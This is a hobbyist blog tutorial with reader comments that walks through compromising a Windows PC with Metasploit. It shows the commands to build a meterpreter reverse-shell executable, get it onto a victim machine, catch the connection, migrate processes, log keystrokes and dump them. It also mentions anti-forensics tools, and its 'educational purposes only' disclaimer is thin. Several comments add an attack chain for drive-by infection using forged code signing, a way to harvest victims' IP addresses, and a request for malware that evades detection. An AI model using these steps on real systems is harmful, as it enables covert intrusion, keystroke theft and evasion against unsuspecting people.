--- The Metasploit Framework ---


Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.
Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).
In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.
Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.
Payload: Actual code which runs on the compromised system after exploitation
Now, what Metasploit IS?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.



METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.
I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.
For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.
Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.

The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~#/etc/init.d/wicd start
to start the wicd manager
Finally, type "startx" to start the GUI mode:
root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.
msf >
Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.


Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps

Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >

Type in the following:
meterpreter > use priv
Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes...

GaM3 0V3R
P.S.: The above information is just for educational purposes only. You should test it against the computer you own.



About Author : This is a guest article written by Mr. Aditya Gupta. He is a  Cyber Security Expert and C|EH Certified Ethical Hacker. His main expertise include  Privacy Issues online, Web Application Security and Wireless Hacking. You can connect with him on facebook here.








63 comments:

Post a Comment
  1. this looks complicated but interesting...:)

  2. nice one!

  3. Nice POst Bro Keep It Up...!!

  4. what do u mean by the 2 versions vmware and ISo?
    m running kubuntu 10.10..can i install it?
    which would u suggest?

  5. I was beating around this topic from weeks. this was very very helpful thakns yar. keep on posting!

  6. hey u have kept on telling what to do but how much time will it need for newbie to be able to start exploiting himself?

  7. Thanks everybody.

    @qwerty
    vmware is a virtualization software. You can run multiple operating systems on a same machine. You dont need the dual booting. You can use Backtrack on your current operating system using backtrack vmware image.

    ISO image is meant to be burned on a disk and you can install it. Use this if you dont want to run backtrack on your current os

    @Saiprasad

    You need to explore a lot. It requires a lot of time..

  8. Hmm, seems good. Will be trying it out soon, rather helpful. Also Aneesh, do you visit public/private hacking fourms? Such as hackforums.net.

  9. Yeah, Sometimes

  10. Thanks for awesome tutorial.. I have some questions though.. Does it work over the Internet too? If yes then how am I gonna get the IP Address of target system?

  11. Yes, it would work over the Internet too.

    To get the IP, one thing you can do, is to use an IP logger PHP Script, host it on a free webhost, and ask the user to visit that link. It may sound little complicated, but trust me, its really simple.

    Good Luck!

  12. Could you please share the link to some good tutorials for mastering BT? Videos or E-books? Thanks!

  13. i have question so i can pay for this too !

    esa_65@hotmail.fi hereis my msn

  14. The metasploit unleashed is a good place for a newbie to start.
    Here's the link

  15. nice post bro.. keep it up.. but i want to know that is there any change if codes for backtack 5????

  16. This one is done in a vm , but how to carry out this in real world situation,
    should i first port forward or dmz my vm (bt ) machine then use my local ip or my external ip . could u please share some light on this

    doing this in real world situation

  17. Metasploit seems insanely complicated, thanks for making it that little bit more clearer! This can be applied to servers, its insane how insecure things are!

  18. Friends feel free to copy the articles by asking to admin as these articles are also been taken from various other websites. . .

  19. How can i copy the .exe file in2 a thumb drive in BT4...???

  20. Great Job Bro

  21. am using metasploit 3.7 version n this procedure is not working out :(
    what do i do ??

  22. hi frndz
    help me plz
    its all going well & i got a session also but some problem like
    [*] Started reverse handler on 192.168.255.130:4444
    [*] Starting the payload handler...
    Now, the payload is listening for all the incoming connections on port 444.
    [*] Sending stage (749056 bytes) to 192.168.255.1
    [*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

    dats it... its not going more,,,
    when i type session -l its show command not found...

    plz helppppp

  23. Great job ! Bdw, backtrack is complex thing - why u didn't write installation procedure ? dual boot ? windows 7 ? USB backtrack usage ?Ubuntu ? kindly, tell me about it !!!!!

    Thanks in advance
    sami

  24. anyone want to learn hacking or how to use metaspolit command in unix. mail me or can chat with me at abhishek.jalan84@gmail.com

  25. Is this above all possible to do in windows? I am downloading the windows version but is it possible to work the same way on it?

  26. Nice Informative Post!!

    Bloggers needed for Hacking Exposed [almashackingtutorials.blogspot.com]
    If interested mail me at almas.malik101@gmail.com

  27. well. i am kinda new to metasploit. I can understand most of it but
    i have a question.
    why do we have to copy the payload file? Cant we inject it to the target?

  28. nice articles,

    keep it up bro

  29. Very Nice Article :
    Can you Post some windows 7 ultimate , basic version exploit ...
    xD
    thanks ..

  30. Will this method works on public network ?

  31. nice one, but explain in backtrack 5

  32. you all are fools except two, one me and the second one is the owner of this web page !!

  33. excellent article..
    very kewl,, Its truly appreciated

  34. i av bt5 live cd, buh im finding it difficult to configure my hsdpa modem with it.
    i also have ubuntu 10.6 dual boot with windows, ive successfully configured my modem with it ubuntu.
    how can i copy the exploiting softwares from the bt5 livecd to the ubuntu os,
    Ill really appreciate ur gud response.

  35. I get an error- metasploit 3 directory doesnt exist. I have the latest backtrack i think. seems fun. maybe i'll look more into this later.. I r confused.

  36. it's all about your hardwork and some knowledge, if you try to get in someone's pc, it takes 100 try and only one you might get success...in short..lots of...A LOT...work required. Do you understand now?, in short, 99 % chances are of only failure.

  37. it's all about your hardwork and some knowledge, if you try to get in someone's pc, it takes 100 try and only one you might get success...in short..lots of...A LOT...work required. Do you understand now?, in short, 99 % chances are of only failure.

  38. This won't work for real, are poeple really this stupid? First off, you have to manually infect a machine. Second, you have to connect to it, it doesn't connect to you.

    99% of the time the machines on the net are behind firewalls which means requirement one is out!

    99% of the time the machines on the net are behind firewalls which means requirement two is out!

    This isn't hacking, if you actually do this at work or on a private network, you WILL GET CAUGHT. This example is a glorified version of VNC with a hidden tasktray icon. I wrote a self installing VNC ver, with no tray or installer, it self installed w a preset pass.

    If you want to know what a real world example of something like this would be, I'll tell you.
    1) Crack any public web server
    2) Build the exact reverse of this example with Meta, so that the exe connects to you when ran, then take an MD5 signed piece of trusted code, find the collisions to the hash and copy the cert to your app. Your app also needs to be an activeX control, or if your not that good, make it a Click Once...
    3) Get a VPS anonymously and setup the listener, setup a bunch and make sure they are all on different ports, or better yet, proxy the inbound connections.
    4) put the Signed ActiveX/ClickOnce control on the site so it auto-installs when a browser goes there.
    5) Sit on your VPS, or a hacked one, and wait...

    Thats a real world example which will actually work in the real world no problem. One tip, when searching for valid signed exe's, look at the older apps... new ones are sha1.. Thats right, I just told the whole world how to bypass MS security right now, and any time for the next few years no problem, there isn't a knowledgebase in the world that'll include a CRL for their ROOT CA's... No way at all. Windoz Suckz.
    3dge3lite

  39. can bactrack use to get computer information from ISP server, if we have ip public of ISP ? thanks for help, freehotspot2340@yahoo.co.id

  40. very nice tutorial, and clearly intended for pen testing purposes as well.
    People who want to know what a real hack looks like, try looking at card tricks, it's a bit of show and a good trick usually. But if you know how it works it's usually just a few simple steps and a show that fits the situation. Hacking is usually a bit like this, one most of the time seemingly harmless entrypoint gives an opportunity to hack the rest of the system. What you need to know if you want to understand how these hacks work is everything about the software used and know where the vurnerabilities are most likely to be found. The hack is done by the hacker, not by the tools!

  41. I cannot migrate to the winlogon.exe process. It says:

    Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insuficient privileges)

    How can I get around that? The machine I'm attacking is running windows 7 (in fact, I'm typing from it as we speak and keyscan is capturing all the keystrokes).

  42. surfing with proxy websites and IP spoofing are same techniques ?
    if not, why proxy websites are construct ?
    if any hacker use proxy website for cyber crime, will he/she not be traced ??????
    hope that you'll reply me !!!!

  43. is there any difference b/w these 2 queries in BT
    root@bt: and root@root:

    when I work root@bt: all konsole functions work but in root@root it doesnt work.. even I coudnt find metasploit frmework in root@root...
    how to fix this problem ???? plz help me.

  44. Ok now author I'm using a windows7 on my laptop and I head that there is some dual os or something like that is it possible for me to have both the Linux and the windows on the same laptop if this is possible how can I go about doing it.Please mail me to: mymcsi.mymcsiworld@gmail.com

  45. This isn't explointing a vulnerability.

  46. such a nice post...

    gr8 :))

  47. Thanks for the great post, keeps me going and giving me more stuff to play with.

    Heres my tutorials on the most basic metasploit use i could do. its not up to your quality but its a start

    http://4stripe.wordpress.com/2012/05/30/your-first-and-easiest-metasploit-exploit-of-a-windows-xp-box-how-to-with-screenshots/

  48. pls send me a fud crypter pls pls

    shanks.goel@gmail.com

  49. you made my day, for any newbee, craving to learn, this is the right place

  50. We have to install metasploit in backtrack or our operating system.

  51. hi

  52. I like this post , can you show the last video about data base version 4.4
    you ar pro >>>> ^_^

  53. its not enough its just the basic of metasploit there is lots of work u can do with it

  54. dude can u post a video on how to use it...

  55. bro can u post a video on this please....

  56. Dual boot is pretty easy. With windows, Defrag your drive first then resize your windows partition with gparted or any other partitioning software. Then reboot with linux disk and run installation, make sure you select the empty space and not your windows partition....done

  57. wow fantastic?

  58. am still husling with the installation of bt let me hope success

  59. Does Metasploit, Backtrack protect your identity or do you need to go thru a VPN? I've heard one or the other has its own VPN? Would you ever hack from your home or do you go elsewhere?

  60. Really awesome and very beautifully explain by you
    i like it a lot because i see first time this type of fully explaination of hacking.....

  61. thanks so much but the basic info will be appreciated so as to have full knowledge

  62. I have few question..

    this is good when we have physical access to victim computer as Payload we are transferring directly. And if we have have physical access then threr are rat, viruses, keyloggers who can help us.

    my quesiton is how to send them via mail..coz it will poped up as virus.. how to make it stelth or undectable

  63. Few minutes ago,my friend access my laptop through metasploit and my problem is can he access whenever he want to or he can access only once.

Post a Comment